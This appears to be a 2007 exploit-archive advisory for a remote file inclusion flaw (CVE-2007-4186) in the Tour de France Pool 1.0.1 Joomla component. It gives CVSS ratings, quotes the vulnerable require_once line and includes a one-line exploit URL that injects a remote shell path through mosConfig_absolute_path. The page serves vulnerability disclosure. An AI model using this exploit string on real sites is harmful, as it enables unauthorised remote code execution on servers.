Tour de France Pool 1.0.1 Remote File Include Bug

2007.08.09

Credit: yollubunlar

Risk: High

Local: No

Remote: Yes

CVE: CVE-2007-4186

CWE: CWE-Other

Ogólna skala CVSS: 6.8/10

Znaczenie: 6.4/10

Łatwość wykorzystania: 8.6/10

Wymagany dostęp: Zdalny

Złożoność ataku: Średnia

Autoryzacja: Nie wymagana

Wpływ na poufność: Częściowy

Wpływ na integralność: Częściowy

Wpływ na dostępność: Częściowy

------------Yollubunlar.Org----------------

Title   : Tour de France Pool 1.0.1 Remote File ?nclude Bug

Author  : Yollubunlar.Org

Orginal : http://yollubunlar.org/our-de-france-pool-101-remote-file-include-43.htm
l

Mail    : yollubunlar (at) hotmail (dot) com [email concealed]

Down    : http://joomla.bultena.com/component/option,com_remository/Itemid,26/func
,download/id,19/chk,f9f89538d34c214c01bfc48dc276e762/lang,en/

Bug     : in admin.tour_toto.php " require_once( $mosConfig_absolute_path.'/administrator/components/com_tour_toto/riders
.php'); "

Exploit : site.com/path/administrator/components/com_tour_toto/admin.tour_toto.php
?mosConfig_absolute_path=sHELL?

Greetz:  Yollubunlar.Org

Not: Vatan Sagolsun ! ehitler lmez , Vatan Blnmez "

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Tour de France Pool 1.0.1 Remote File Include Bug

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.